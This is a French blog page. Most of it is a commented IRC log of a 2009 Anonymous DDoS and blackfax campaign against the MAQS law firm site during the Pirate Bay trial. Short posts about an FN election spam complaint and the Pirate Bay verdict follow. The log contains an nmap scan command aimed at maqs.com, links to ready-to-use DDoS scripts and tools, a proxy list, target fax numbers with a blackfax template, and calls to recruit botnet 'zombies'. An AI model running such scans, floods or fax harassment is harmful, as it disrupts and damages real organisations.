<***> alright bros http://www.maqs.com/upload/downloads/HOW%20YOU%20SET%20UP%20BUSINESS%20IN%20DENMARK.pdf << 1.56mb file

* 19:45

<***> and is anyone actualy collecting infos about the people who work there ?
<***> we should send over 9000 as we DDoS, so we completly fuck all their shit up
<***> is there an imacro out there for blackfaxing?

* 20:18

<***> omg they hacked partyvan why ???
<***> email spammer
<***> if we tripple the userns we could barly write
<***> www.partyvan.info right?
<***> omghi stfu ok
<***> who hacked partyvan?
<***> ***: omg you are one of the hackerz ?
<***> ***, no ONER

* 20:20

<***> spam this link around all the /b/’s, when we got enough zombies just tell em how to bwraep, ddos or fax and were done

* 20:24

[20:24] <***> We shall go on to the end, we shall fight in the forums, we shall fight on the servers and faxes, we shall fight with growing confidence and growing strength, we shall defend our torrents, whatever the cost may be, we shall fight on the networks, we shall fight on the image boards, we shall fight in the blogs and in the tubes, we shall fight in the chat rooms; we shall never surrender, and even if, which I do not for a moment believe, this community or any pirate community were subjugated and starving for warez, then our coalition amongst the tubes, armed with proxies, Epic Fail Cannons, and LOIC’s and guarded by anonymous, would carry on the struggle, until, in good time, the rest of the internet, and the world, with all its power and might, steps forth to the rescue and the liberation of the seeders.

* 20:26

<***> sudo nmap -sV -vv -p1-65535 -P0 -D google.com -O maqs.com

* 20:54

<***> Another ddos perl code : http://pastebay.com/10979 (rdy to go)

* 21:11

<***> http://rapidshare.com/files/220841115/EpicFailCannon_FTFY.rar
<***> http://www.partyvan.info/wiki/Operation_Baylout is up again

* 22:20

— Presque 250 personne sur l’un des 4 channels dédiés et l’attaque est prévue dans plus de 3h30 —
<***> Smurfing is a type of DoS attack
<***> ***: do you know syn flooding?
<***> smurf.exe is a screen mate who looks like old smurf, dancing around ur start button
<***> o thanks
<***> else: yeah
<***> GO PIRATES
<***> someone should use a botnetttt

* 23:12

<***> ***, are the other IRC’s involved?
<***> FOR GREAT RUSSSIA WE WILL PROVAIL/cruise controll
<***> We will get the ebums jewgrounds 4chan etc involved in about an hour
<***> YOU STILL HAVE TO STEER
<***> *** 4chan is already involved

* 23:23

<***> http://anonymous.pastebay.com/9460

* 23:53

<***> http://pastie.org/private/qwxl4jhk6ghe1ktao0tewa <---better perl script

(…)
<***> http://encyclopediadramatica.com/RAIDCHAN

* 00:10

<***> http://img.12chan.crabdance.com/b/
<***> http://24chan.org/b/
<***> http://img.420chan.org/b/
<***> http://94chan.org/b/
<***> http://www.99chan.org/b/
<***> http://www.1024chan.org/b/

* 01:09

— maqs.com est deja down, une heure avant le début de la manifestation le site a été victime de testeurs impatients —
<***> use my paste http://pastie.org/private/qwxl4jhk6ghe1ktao0tewa
— un nouveau war script en python très intéressant utilisant une proxy list codé par quelqu’un qui ne nous est pas vraiment inconnu —
<***> http://friendpaste.com/14WvKAdlntsdIECPOBVMRd

* 01:23

<***> ***: depends how much it can handle
<***> 34 Minutes and 26 Seconds to go until: WE BEGIN OUR ASSAULT!!!
<***> works on win2k/xp/vista/2k3
<***> all service packs
<***> try different amounts
<***> ***: heh yeah
<***> nice 😉
<***> extrapolate: i have a quad, i have 10 right now, how good is that?
<***> *** I wish I had your botnet…

<***> We shall go on to the end, we shall fight in the forums, we shall fight on the servers and faxes, we shall fight with growing confidence and growing strength, we shall defend our torrents, whatever the cost may be, we shall fight on the networks, we shall fight on the image boards, we shall fight in the blogs and in the tubes, we shall fight in the chat rooms; we shall never surrender, and even if, which I do not for a moment believe, this

* 01:27

— 320 personnes sur le channel #tpb !!! —
<***> M.P.A.A. Fax #: 914-333-7541. MAQS Fax #: +46 8 407 09 10. 8×11″ template for blackfax (CMYK for optimal ink cartridge raep): http://dl.getdropbox.com/u/121432/anonCMYK.pdf Free faxes over the Internet : http://digg.com/u11a12 http://www.freepopfax.com/ http://myfax.com/free/
<***> 28 Minutes and 44 Seconds to go until: WE BEGIN OUR ASSAULT!!!
(…)
<***> NEW VERSION OF LAZER http://www.sendspace.com/file/1hef6w
<***> injection exploit: http://rapidshare.com/files/224600643/pwnMAQS.exe.html

* 01:32

— La manifestation commence dans 32 minutes et maqs.com a déjà du mal —
image-23

* 01:45

Python means LOVE … this is to give a kiss to MPAA & the poxy list : http://www.crashdump.fr/myFiles/autres/proxyDos/proxies.txt … Crashdump and Gawel u guys r0x

* 01:45

<***> 7 Minutes and 47 Seconds to go until: WE BEGIN OUR ASSAULT!!!

===========
<***> !countdown
<***> 0 Minutes and 52 Seconds to go until: WE BEGIN OUR ASSAULT!!!
===========

—- c’est parti —

[01:56] 0 Minutes and 0 Seconds to go until: WE BEGIN OUR ASSAULT!!!
[01:56] -DISABLE`/#tpb- GO GO GO GO GO GO GO GOG OG OG OG OG GO GOG OG OGOG OGGOGOGOGOOGOGOGOOGOGOGOGO

<***> FIRE LAZERS NAO
<***> FIRE LAZERS NAO
<***> FIRE LAZERS NAO
<***> FIRE LAZERS NAO
<***> LAUUUUUUUNCH
<***> GOOOOOOOOOOO
<***> FIRE LAZERS NAO

—- Le site a explosé à la seconde même de l’attaque —-

PoolWorker-9 URLError(error(61, 'Connection refused'),)
PoolWorker-7 URLError(error(61, 'Connection refused'),)
PoolWorker-25 URLError(error(61, 'Connection refused'),)
PoolWorker-19 HTTP Error 404: Not Found HTTPError()
PoolWorker-35 HTTP Error 404: Object Not Found HTTPError()
PoolWorker-6 URLError(error(61, 'Connection refused'),)
PoolWorker-39 URLError(error(51, 'Network is unreachable'),)

image-4

— 4 minutes plus tard —

image-8

* 02:48

image-10

Magic Links :

* Google lance une OPA sur The Pirate Bay

* Defcon upgraded

* Operation Baylout sur Facebook

Jean-Michel Dubois (FN) commence à me chauffer les oreilles

image-18Ce matin, c’est le second spam que je reçois pour la campagne des européennes de ce type. Un spam d’amateur d’une soit disant agence de presse.
Tout de suite, un premier détail attire mon attention, le spam vient d’un compte Gmail, ce dans le cadre d’une campagne electorale. Usuellement je ne fais pas attention à ce genre de spam, il partent directement dans /dev/null, mais là une somme d’éléments m’interpelle :

* il n’y a pas de moyen de se désinscrire de la liste
* mon mail a été collecté illégalement pour atterrir dans cette liste et je compte bien savoir comment
* Je ne fournis pas mon mail professionnel (ni de mail tout court) pour ce genre de choses, surtout à des gens du FN avec lesquels je ne partage AUCUNE affinité
* Il y a un contact presse en bas du courrier, il s’agit d’un co-listier de Monsieur Dubois, Monsieur Sanchez
* Je contacte donc Mr Sanchez, dont le numéro de téléphone est indiqué dans le spam, je lui demande tout de suite d’enlever mon mail de sa base de données, conformément à mon droit de retrait (il me dit qu’il n’est pas en mesure d’avoir accès à cette base de données), je lui demande alors des précisions sur la fameuse agence de presse … il n’en sait pas plus, il ne connaît pas leur nom, il n’a aucun contact à me donner (on en rediscutera au moment de la clôture des comptes de campagne).
* A la réception du premier spam, j’avais en retour aussitôt demandé le retrait de mon mail de la base de données de cette « agence ». Je n’ai bien évidemment eu aucune autre réponse que de recevoir le même spam 3 jours plus tard
* Il va de soi que je vais me garder le droit de porter plainte contre ce Monsieur Dubois et cette agence de guignols qui semble se foutre comme de l’an 40 de la législation pourtant très précise sur les courriers non sollicités, la collecte des adresses mails et la constitution de bases de données, l’OPT-in et le droit élémentaire de retrait…

Alors qui es tu Agence.Presse.Ile.de.France_AT_Gmail.com qui ne peut pas pas se payer un serveur de mail pour spammer, qui récupère ILLEGALEMENT des adresses mail, ne laisse pas le loisir de se désabonner de la liste, et utilise un compte GMAIL.

C’est puant d’amateurisme :

  • 1° le spammeur agit depuis le territoire national,
  • 2° les messages ont transité par un FAI français,
  • 3° les spams sont reçus sur mon adresse professionnelle,
  • 4° pas de moyen de se désinscrire, personne ne répond quand on demande une radiation de la base de données,
  • 5° le contact indiqué sur le mail ne dit ne pas connaître l’émetteur du spam alors que ce monsieur est co-listier du demandeur et responsable Presse (ben oui monsieur Sanchez, vous vous êtes payés ma tête là….)
  • 6° je ne vais pas vous rappeler l’encadrement légal des campagne électroniques que chaque candidat se doit de connaître sur le bout des doigts, mais ce genre de petite histoire peut vous valoir une belle invalidation en bon et due forme, si, si, cherchez bien …

Nous voilà donc avec tous les ingrédients, même plus, nécessaires à faire condamner sur les fondements de la loi de 1978 l’agence et le commanditaire de cette campagne électronique. Et oui, il y a déjà eu des condamnations, plus que vous ne le pensez d’ailleurs.

Je me réserve évidemment le droit de donner une suite légale à cette affaire. J’ai très peu apprécié les réponses de Monsieur Sanchez qui s’est délibérément payé ma tête en prétendant ne pas être au courant de quoi que ce soit.

On va donc contacter cette fameuse agence de communication…

J’argue un mailing professionnel, une certaine Sandrine Leroy me répond, aucune autre information pas de signature, s’il s’agit d’une véritable société, les pratiques de cette dernière ne fleurent pas vraiment le professionnalisme, on verra bien si cette personne est enfin disposée à supprimer mon mail pro de sa base de données qui ne peut pas avoir été acquise de manière légale.

Prochaine étape, le recommandé avec la CNIL et la commission des comptes de campagne en copie.

Voici le spam en question :

image-22

Pirate Bay : un an de prison ferme pour les auteurs tracker de torrents

image-17La justice Suédoise a finalement tranché, Fredrik Neij, Gottfrid Svartholm, Carl Lundstrom et Peter Sunde écopent chacun d’un an de prison ferme pour délit de contrefaçon. Un verdict assez incompréhensible à l’observation des faits et du déroulement du procès.
La peine est assortie d’une sanction financière de 3 millions d’euros : quand on connaît la réalité des chiffres cette somme est absurde, il y a peu de chances qu’ils soient en mesure de payer quoi que ce soit. Penser que Pirate Bay tire des revenus substantiels de la publicité est une bêtise, ils ne servent même pas à couvrir les frais de l’infrastructure.
Le juge a retenu comme fait que Pirate bay est une organisation commerciale délictueuse (!). Ce jugement risque d’avoir un impact retentissant non seulement sur les communautés de peer to peer mais par extension sur les pseudos services légaux de streaming comme Deezer qui permettent eux aussi le téléchargement.
« en mettant en place un moteur de recherche aux fonctions avancées, a aidé ses utilisateurs à partager et télécharger des contenus protégés par le droit d’auteur. S’il reconnaît que les utilisateurs sont les premiers coupables des actes de contrefaçon, il estime que The Pirate Bay s’est rendu complice en leur fournissant des outils et en les incitant à les utiliser » ajoute Numerama.
Un verdict allant complètement contre les faits objectifs révélés pendant le procès où l’accusation s’est vue démonter uns à uns tous ses griefs.

Les accusés interjetteront appel, affaire à suivre.